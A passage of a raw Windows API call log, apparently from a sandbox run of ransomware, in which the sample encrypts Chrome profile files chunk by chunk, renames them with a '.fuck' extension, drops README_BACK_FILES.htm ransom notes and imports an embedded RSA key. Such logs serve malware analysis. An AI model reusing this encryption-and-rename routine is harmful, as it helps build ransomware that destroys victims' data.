CryptEncrypt (in: hKey=0x2e7fc00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0264.952] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0264.952] ReadFile (in: hFile=0x5d40, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0264.952] CryptEncrypt (in: hKey=0x2e7fc00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0264.952] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0264.952] ReadFile (in: hFile=0x5d40, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0264.952] CryptEncrypt (in: hKey=0x2e7fc00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0264.952] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0264.952] ReadFile (in: hFile=0x5d40, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0264.953] CryptEncrypt (in: hKey=0x2e7fc00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0264.953] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0264.953] ReadFile (in: hFile=0x5d40, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0264.953] CryptEncrypt (in: hKey=0x2e7fc00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0264.953] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0264.953] ReadFile (in: hFile=0x5d40, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0264.953] CryptEncrypt (in: hKey=0x2e7fc00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0264.953] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0264.953] ReadFile (in: hFile=0x5d40, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0264.953] CryptEncrypt (in: hKey=0x2e7fc00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0264.953] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0264.953] ReadFile (in: hFile=0x5d40, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0264.953] CryptEncrypt (in: hKey=0x2e7fc00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0264.953] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0264.953] ReadFile (in: hFile=0x5d40, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0264.953] CryptEncrypt (in: hKey=0x2e7fc00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0264.954] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0264.954] ReadFile (in: hFile=0x5d40, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0264.954] CryptEncrypt (in: hKey=0x2e7fc00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0264.954] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0264.954] ReadFile (in: hFile=0x5d40, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0264.954] CryptEncrypt (in: hKey=0x2e7fc00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0264.954] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0264.954] ReadFile (in: hFile=0x5d40, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0264.954] CryptEncrypt (in: hKey=0x2e7fc00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0264.954] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0264.954] ReadFile (in: hFile=0x5d40, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0264.954] CryptEncrypt (in: hKey=0x2e7fc00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0264.954] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0264.954] ReadFile (in: hFile=0x5d40, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0264.954] CryptEncrypt (in: hKey=0x2e7fc00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0264.954] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0264.954] ReadFile (in: hFile=0x5d40, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0264.954] CryptEncrypt (in: hKey=0x2e7fc00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0264.955] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0264.955] ReadFile (in: hFile=0x5d40, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x100, lpOverlapped=0x0) returned 1 [0264.955] CryptEncrypt (in: hKey=0x2e7fc00, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x100, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x110) returned 1 [0264.955] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x110, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x110, lpOverlapped=0x0) returned 1 [0264.955] CloseHandle (hObject=0x5d40) returned 1 [0264.955] CloseHandle (hObject=0x5d48) returned 1 [0264.955] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\previews_opt_out.db.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\previews_opt_out.db.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\previews_opt_out.db" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\previews_opt_out.db"), bFailIfExists=0) returned 1 [0264.958] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\previews_opt_out.db", dwFileAttributes=0x0) returned 1 [0264.958] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\previews_opt_out.db.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\previews_opt_out.db.gsg")) returned 1 [0264.959] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\previews_opt_out.db" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\previews_opt_out.db"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\previews_opt_out.db.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\previews_opt_out.db.fuck")) returned 1 [0264.960] CryptDestroyHash (hHash=0x2e7fb00) returned 1 [0264.960] CryptDestroyKey (hKey=0x2e7fc00) returned 1 [0264.960] CryptReleaseContext (hProv=0x2e7a500, dwFlags=0x0) returned 1 [0264.960] FindNextFileA (in: hFindFile=0x29386f8, lpFindFileData=0x2b9df54 | out: lpFindFileData=0x2b9df54) returned 1 [0264.960] FindNextFileA (in: hFindFile=0x29386f8, lpFindFileData=0x2b9df54 | out: lpFindFileData=0x2b9df54) returned 1 [0264.960] FindNextFileA (in: hFindFile=0x29386f8, lpFindFileData=0x2b9df54 | out: lpFindFileData=0x2b9df54) returned 1 [0264.960] FindNextFileA (in: hFindFile=0x29386f8, lpFindFileData=0x2b9df54 | out: lpFindFileData=0x2b9df54) returned 1 [0264.961] FindNextFileA (in: hFindFile=0x29386f8, lpFindFileData=0x2b9df54 | out: lpFindFileData=0x2b9df54) returned 1 [0264.961] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Service Worker\\*.*", lpFindFileData=0x2b9dbb8 | out: lpFindFileData=0x2b9dbb8) returned 0x2e7fb00 [0264.961] FindNextFileA (in: hFindFile=0x2e7fb00, lpFindFileData=0x2b9dbb8 | out: lpFindFileData=0x2b9dbb8) returned 1 [0264.961] FindNextFileA (in: hFindFile=0x2e7fb00, lpFindFileData=0x2b9dbb8 | out: lpFindFileData=0x2b9dbb8) returned 1 [0264.961] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Service Worker\\CacheStorage\\*.*", lpFindFileData=0x2b9d81c | out: lpFindFileData=0x2b9d81c) returned 0x2e7fbc0 [0264.962] FindNextFileA (in: hFindFile=0x2e7fbc0, lpFindFileData=0x2b9d81c | out: lpFindFileData=0x2b9d81c) returned 1 [0264.962] FindNextFileA (in: hFindFile=0x2e7fbc0, lpFindFileData=0x2b9d81c | out: lpFindFileData=0x2b9d81c) returned 1 [0264.962] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Service Worker\\CacheStorage\\28da9c56fde4021055a681112c092453f74d8dd8\\*.*", lpFindFileData=0x2b9d480 | out: lpFindFileData=0x2b9d480) returned 0x2e7fc00 [0264.975] FindNextFileA (in: hFindFile=0x2e7fc00, lpFindFileData=0x2b9d480 | out: lpFindFileData=0x2b9d480) returned 1 [0264.975] FindNextFileA (in: hFindFile=0x2e7fc00, lpFindFileData=0x2b9d480 | out: lpFindFileData=0x2b9d480) returned 1 [0264.975] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Service Worker\\CacheStorage\\28da9c56fde4021055a681112c092453f74d8dd8\\8c4d7305-348c-4e49-a93a-83143a3b9025\\*.*", lpFindFileData=0x2b9d0e4 | out: lpFindFileData=0x2b9d0e4) returned 0x2e7ec80 [0265.026] FindNextFileA (in: hFindFile=0x2e7ec80, lpFindFileData=0x2b9d0e4 | out: lpFindFileData=0x2b9d0e4) returned 1 [0265.026] FindNextFileA (in: hFindFile=0x2e7ec80, lpFindFileData=0x2b9d0e4 | out: lpFindFileData=0x2b9d0e4) returned 1 [0265.027] FindNextFileA (in: hFindFile=0x2e7ec80, lpFindFileData=0x2b9d0e4 | out: lpFindFileData=0x2b9d0e4) returned 1 [0265.027] FindNextFileA (in: hFindFile=0x2e7ec80, lpFindFileData=0x2b9d0e4 | out: lpFindFileData=0x2b9d0e4) returned 1 [0265.027] FindNextFileA (in: hFindFile=0x2e7ec80, lpFindFileData=0x2b9d0e4 | out: lpFindFileData=0x2b9d0e4) returned 1 [0265.027] FindNextFileA (in: hFindFile=0x2e7ec80, lpFindFileData=0x2b9d0e4 | out: lpFindFileData=0x2b9d0e4) returned 1 [0265.027] FindNextFileA (in: hFindFile=0x2e7ec80, lpFindFileData=0x2b9d0e4 | out: lpFindFileData=0x2b9d0e4) returned 1 [0265.027] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Service Worker\\CacheStorage\\28da9c56fde4021055a681112c092453f74d8dd8\\8c4d7305-348c-4e49-a93a-83143a3b9025\\index-dir\\*.*", lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0x2e7ee00 [0265.038] FindNextFileA (in: hFindFile=0x2e7ee00, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0265.038] FindNextFileA (in: hFindFile=0x2e7ee00, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0265.038] FindNextFileA (in: hFindFile=0x2e7ee00, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0 [0265.038] FindClose (in: hFindFile=0x2e7ee00 | out: hFindFile=0x2e7ee00) returned 1 [0265.039] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Service Worker\\CacheStorage\\28da9c56fde4021055a681112c092453f74d8dd8\\8c4d7305-348c-4e49-a93a-83143a3b9025\\index-dir\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\service worker\\cachestorage\\28da9c56fde4021055a681112c092453f74d8dd8\\8c4d7305-348c-4e49-a93a-83143a3b9025\\index-dir\\readme_back_files.htm")) returned 0xffffffff [0265.040] AreFileApisANSI () returned 1 [0265.040] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2eddc40, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 207 [0265.040] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Service Worker\\CacheStorage\\28da9c56fde4021055a681112c092453f74d8dd8\\8c4d7305-348c-4e49-a93a-83143a3b9025\\index-dir\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\service worker\\cachestorage\\28da9c56fde4021055a681112c092453f74d8dd8\\8c4d7305-348c-4e49-a93a-83143a3b9025\\index-dir\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9cecc, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d64 [0265.044] GetFileType (hFile=0x5d64) returned 0x1 [0265.044] WriteFile (in: hFile=0x5d64, lpBuffer=0x2b9bb18*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9bb10, lpOverlapped=0x0 | out: lpBuffer=0x2b9bb18*, lpNumberOfBytesWritten=0x2b9bb10*=0x5ec, lpOverlapped=0x0) returned 1 [0265.045] FindNextFileA (in: hFindFile=0x2e7ec80, lpFindFileData=0x2b9d0e4 | out: lpFindFileData=0x2b9d0e4) returned 0 [0265.045] FindClose (in: hFindFile=0x2e7ec80 | out: hFindFile=0x2e7ec80) returned 1 [0265.046] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Service Worker\\CacheStorage\\28da9c56fde4021055a681112c092453f74d8dd8\\8c4d7305-348c-4e49-a93a-83143a3b9025\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\service worker\\cachestorage\\28da9c56fde4021055a681112c092453f74d8dd8\\8c4d7305-348c-4e49-a93a-83143a3b9025\\readme_back_files.htm")) returned 0xffffffff [0265.046] AreFileApisANSI () returned 1 [0265.046] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2edd2f8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 197 [0265.046] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Service Worker\\CacheStorage\\28da9c56fde4021055a681112c092453f74d8dd8\\8c4d7305-348c-4e49-a93a-83143a3b9025\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\service worker\\cachestorage\\28da9c56fde4021055a681112c092453f74d8dd8\\8c4d7305-348c-4e49-a93a-83143a3b9025\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9d268, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d50 [0265.047] GetFileType (hFile=0x5d50) returned 0x1 [0265.048] WriteFile (in: hFile=0x5d50, lpBuffer=0x2b9beb4*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9beac, lpOverlapped=0x0 | out: lpBuffer=0x2b9beb4*, lpNumberOfBytesWritten=0x2b9beac*=0x5ec, lpOverlapped=0x0) returned 1 [0265.049] FindNextFileA (in: hFindFile=0x2e7fc00, lpFindFileData=0x2b9d480 | out: lpFindFileData=0x2b9d480) returned 1 [0265.049] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9d390 | out: lpSystemTimeAsFileTime=0x2b9d390) [0265.049] GetLastError () returned 0x0 [0265.049] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Service Worker\\CacheStorage\\28da9c56fde4021055a681112c092453f74d8dd8\\index.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\service worker\\cachestorage\\28da9c56fde4021055a681112c092453f74d8dd8\\index.txt")) returned 0x20 [0265.050] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Service Worker\\CacheStorage\\28da9c56fde4021055a681112c092453f74d8dd8\\index.txt", dwFileAttributes=0x80) returned 1 [0265.050] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Service Worker\\CacheStorage\\28da9c56fde4021055a681112c092453f74d8dd8\\index.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\service worker\\cachestorage\\28da9c56fde4021055a681112c092453f74d8dd8\\index.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d50 [0265.051] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Service Worker\\CacheStorage\\28da9c56fde4021055a681112c092453f74d8dd8\\index.txt.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\service worker\\cachestorage\\28da9c56fde4021055a681112c092453f74d8dd8\\index.txt.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d64 [0265.052] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Service Worker\\CacheStorage\\28da9c56fde4021055a681112c092453f74d8dd8\\index.txt.gsg", dwFileAttributes=0x2) returned 1 [0265.053] CryptAcquireContextA (in: phProv=0x2b9c38c, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9c38c*=0x2e7a500) returned 1 [0265.055] CryptCreateHash (in: hProv=0x2e7a500, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9c390 | out: phHash=0x2b9c390) returned 1 [0265.055] lstrlenA (lpString="cQjUWNeXOWocqpPGVyWaXFrKzMlQm") returned 29 [0265.055] CryptHashData (hHash=0x2e7e9c0, pbData=0x28cb440, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0265.055] CryptDeriveKey (in: hProv=0x2e7a500, Algid=0x6610, hBaseData=0x2e7e9c0, dwFlags=0x1000000, phKey=0x2b9c37c | out: phKey=0x2b9c37c*=0x2e7ea00) returned 1 [0265.056] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9c398, pcbBinary=0x2b9c378, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9c398, pcbBinary=0x2b9c378, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0265.056] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9c398, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9c36c, pcbStructInfo=0x2b9c374 | out: pvStructInfo=0x2b9c36c, pcbStructInfo=0x2b9c374) returned 1 [0265.056] CryptAcquireContextA (in: phProv=0x2b9c388, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9c388*=0x2e77970) returned 1 [0265.056] CryptImportPublicKeyInfo (in: hCryptProv=0x2e77970, dwCertEncodingType=0x1, pInfo=0x2eb1040*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2eb1070*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2eb1078*, PublicKey.cUnusedBits=0x0), phKey=0x2b9c380 